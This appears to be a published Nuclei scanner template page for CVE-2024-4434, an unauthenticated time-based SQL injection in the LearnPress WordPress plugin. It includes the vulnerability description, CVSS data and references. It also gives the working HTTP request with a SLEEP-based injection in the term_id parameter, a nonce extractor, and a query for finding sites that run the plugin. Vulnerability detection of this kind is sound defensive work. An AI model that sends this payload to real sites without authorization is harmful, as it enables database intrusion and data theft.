Skip to content

LearnPress WordPress LMS Plugin <= 4.2.6.5 - SQL Injection

ID: CVE-2024-4434

Severity: critical

Author: s4e-io

Tags: cve,cve2024,wp,wp-plugin,wordpress,sqli,learnpress

The LearnPress WordPress LMS Plugin plugin for WordPress is vulnerable to time-based SQL Injection via the ‘term_id’ parameter in versions up to, and including, 4.2.6.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

id: CVE-2024-4434
info:
name: LearnPress WordPress LMS Plugin <= 4.2.6.5 - SQL Injection
author: s4e-io
severity: critical
description: |
The LearnPress WordPress LMS Plugin plugin for WordPress is vulnerable to time-based SQL Injection via the ‘term_id’ parameter in versions up to, and including, 4.2.6.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
remediation: Fixed in 4.2.6.6
reference:
- https://inky-knuckle-2c2.notion.site/Unauthenticated-SQLI-in-Learnpress-plugin-Version-4-2-6-5-a86fe63bcc7b4c9988802688211817fd
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learnpress/learnpress-wordpress-lms-plugin-4265-unauthenticated-time-based-sql-injection
- https://nvd.nist.gov/vuln/detail/CVE-2024-4434
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-4434
epss-score: 0.00063
epss-percentile: 0.2659
cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:wordpress:*:*:*
metadata:
verified: true
max-request: 2
publicwww-query: "/wp-content/plugins/learnpress"
product: learnpress
vendor: thimpress
tags: cve,cve2024,wp,wp-plugin,wordpress,sqli,learnpress
variables:
num: "{{rand_int(10000, 99999)}}"
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
@timeout 20s
POST /wp-json/lp/v1/courses/archive-course?term_id={{num}})+OR+SLEEP(6)+--+A HTTP/1.1
Host: {{Hostname}}
X-WP-Nonce: {{nonce}}
matchers:
- type: dsl
dsl:
- "duration_2 >= 6"
- "status_code_2 == 200"
- 'contains(content_type,"application/json")'
- 'contains_all(body_2,"No courses were found","success")'
condition: and
extractors:
- type: regex
name: nonce
part: body
group: 1
regex:
- '"nonce":"([a-z0-9]+)","is_course_archive"'
internal: true
# digest: 490a00463044022026a4e5de57ef8e56439b4e92f1a7ecbf3d572b08892f0289e05c0937fcdfdf2402204aa73585a58f5b1dd8af0a0c8ca8b92ae504952f96dbcf819c1f235213944607:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-4434.yaml"

View on Github